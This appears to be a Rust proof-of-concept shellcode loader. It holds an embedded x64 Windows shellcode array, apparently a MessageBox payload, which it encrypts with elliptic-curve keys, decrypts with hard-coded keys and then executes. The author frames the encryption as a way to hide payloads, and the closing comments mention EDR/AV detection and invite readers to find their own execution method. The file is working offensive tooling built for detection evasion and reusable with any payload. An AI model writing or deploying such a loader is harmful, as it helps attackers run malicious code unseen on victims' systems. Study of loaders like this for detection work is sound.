/*
    Title: Elliptic Curve Cryptography (ECC) Shellcode Encryption and Decryption
    Description: This Proof of Concept (POC) demonstrates the encryption of shellcode using a public key and its subsequent decryption using the corresponding private key and R_Point.
    Author: Smukx.E [@5mukx]
*/


// core program of shellcode execution
#![allow(deprecated)]
#![allow(unused_imports)]
use std::default;

use decryption::decode_shellcode;
use execute_shellcode::shell_exec;
use generate_keys::{generate_random_keys, reconstruct_keys};
use k256::{elliptic_curve::{sec1::EncodedPoint, AffinePoint}, Secp256k1};
use sha2::digest::generic_array::GenericArray;
pub mod generate_keys;
pub mod encryption;
pub mod decryption;
pub mod execute_shellcode;
use k256::elliptic_curve::sec1::FromEncodedPoint;

pub type GenericKeyGen =  GenericArray<u8, sha2::digest::typenum::UInt<sha2::digest::typenum::UInt<sha2::digest::typenum::UInt<sha2::digest::typenum::UInt<sha2::digest::typenum::UInt<sha2::digest::typenum::UInt<sha2::digest::typenum::UTerm, sha2::digest::consts::B1>, sha2::digest::consts::B0>, sha2::digest::consts::B0>, sha2::digest::consts::B0>, sha2::digest::consts::B0>, sha2::digest::consts::B0>>;

// Actual Example Shellcode !
const SHELLCODE: [u8; 328] = [
    0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,
    0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
    0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,
    0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,
    0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
    0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
    0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,
    0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,
    0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,
    0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
    0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
    0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
    0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,
    0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,
    0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,
    0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,
    0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,
    0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,
    0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x3e,
    0x48,0x8d,0x8d,0x30,0x01,0x00,0x00,0x41,0xba,0x4c,0x77,0x26,
    0x07,0xff,0xd5,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,
    0x8d,0x95,0x0e,0x01,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x24,0x01,
    0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
    0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,
    0x48,0x65,0x79,0x20,0x6d,0x61,0x6e,0x2e,0x20,0x49,0x74,0x73,
    0x20,0x6d,0x65,0x20,0x53,0x6d,0x75,0x6b,0x78,0x00,0x6b,0x6e,
    0x6f,0x63,0x6b,0x2d,0x6b,0x6e,0x6f,0x63,0x6b,0x00,0x75,0x73,
    0x65,0x72,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00
];

fn main(){

    // => Generate Random Public and Private key and convert them into bytes.
    /*
    {
        let (private, public) = generate_random_keys();
        println!("{:?}\n", private);
        println!("{:?}\n", public);
    }
    */

    // => Replace your actual private and public key. 
    // These are generated from generate_random_keys().

    let private = [253, 48, 173, 74, 135, 132, 245, 180, 220, 175, 38, 223, 14, 31, 202, 97, 50, 186, 157, 224, 105, 46, 50, 69, 209, 50, 239, 88, 41, 68, 62, 172];
    let public = [4, 144, 27, 74, 69, 101, 105, 125, 38, 105, 206, 96, 151, 196, 111, 194, 141, 115, 153, 205, 128, 163, 134, 252, 25, 177, 33, 221, 87, 78, 213, 165, 128, 109, 210, 80, 20, 251, 117, 194, 54, 71, 104, 98, 22, 179, 56, 31, 200, 162, 45, 26, 138, 172, 110, 73, 16, 179, 187, 174, 11, 208, 46, 100, 68];
    
    // => reconstruct_keys() function helps to reconstruct private and public keys from bytes. (Hardest Part)
    
    let (private_keys, public_keys) = reconstruct_keys(private.into(), Box::new(public));

    println!("Reconstruction Check: ");
    println!("Decrypt Private key: {:?}",private_keys);
    println!("Decrypt Public Key: {:?}", public_keys);
    

    println!();

    // => Encrypting Shellcode using public key. we get shellcode+R Point.
    
    let (r_point , encrypted_shellcode) = encryption::encrypt_shellcode(&SHELLCODE, &public_keys);

    // i decided to convert the r_point => as byte 
    let r_point_bytes = r_point.as_bytes();
    println!();
    println!("Serialized r_point: {:?}", r_point_bytes);
    println!();
    

    // => In order to decrypt the shellcode you need two things. R Point and Private Keys ;) 
    // Good news is that you do need to write to decode bytes to keys since i already wrote and integrated into each function and steps.
    // Pass the R Point bytes and you are good to go.

    /* => Sample Test i did to check if it rebuils perfectly
    let r = EncodedPoint::<Secp256k1>::from_bytes(r_point_bytes)
        .expect("Invalid EncodedPoint");

    println!("Rebuilt r_point: {:?}", r); 
    */
    
    let decrypted_shellcode = decode_shellcode(&encrypted_shellcode, &r_point_bytes, &private_keys);
    
    // Print and execute the shellcode 
    
    println!("Decrypted Shellcode: {:?}\n", decrypted_shellcode);
    println!("Actual Shellcode: {:?}\n", SHELLCODE);


    // Since we are using very simple execution methods to execute the program. it is possible to get detected by EDRS/AV..
    // use your own nerdy way to execute the shellcode. 

    println!("Executing Shellcode: ");
    shell_exec(decrypted_shellcode);
}